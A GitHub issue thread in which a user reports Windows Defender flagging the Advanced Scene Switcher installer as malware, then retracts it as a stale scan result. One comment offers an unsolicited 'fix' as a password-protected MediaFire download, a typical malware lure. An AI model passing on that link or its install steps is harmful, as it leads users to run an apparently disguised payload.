### ISSUE TITLE
snackarcin malware threat reported

### ISSUE THREAD

**Issue by lukkea** [WarmUpTill/SceneSwitcher#1186]
### Operating System Info

Windows 10

### OBS Studio Version

30.2.2

### Advanced Scene Switcher Version

1.27.2

### Expected Behavior

For the win-x64 installer to not cause a download warning in Edge & for Windows Defender to not report the exe contains the "snackarcin" threat.

### Current Behavior

Edge warns that the download may be unsafe and then Windows Defender discovers PUADIManager/Win32/Snackarcin threat within the dowloaded installer executable.

### Steps to Reproduce

1. Go to https://github.com/WarmUpTill/SceneSwitcher/releases/tag/1.27.2
2. Click on https://github.com/WarmUpTill/SceneSwitcher/releases/download/1.27.2/advanced-scene-switcher-1.27.2-windows-x64-Installer.exe
3. Override the warnings to download anyway
4. Scan the downloaded executable with Windows Defender

### Anything else we should know?

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Snackarcin.B&msockid=31ae03a0c06e60e1123317f8c46e66c6

![image](https://github.com/user-attachments/assets/092a7544-56f5-45c3-99a5-c03bd8bf722e)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lukkea** [comment]
Sorry, I interpreted the scan result incorrectly.

I thought I was looking at the result from scanning the Scene Switcher installer but it seems Defender had a previous scan from the 1st August that I hadn't resolved properly and it was erroneously reporting that to me again.

**Comment by WarmUpTill** [comment]
No worries :)
Thanks for letting me know!
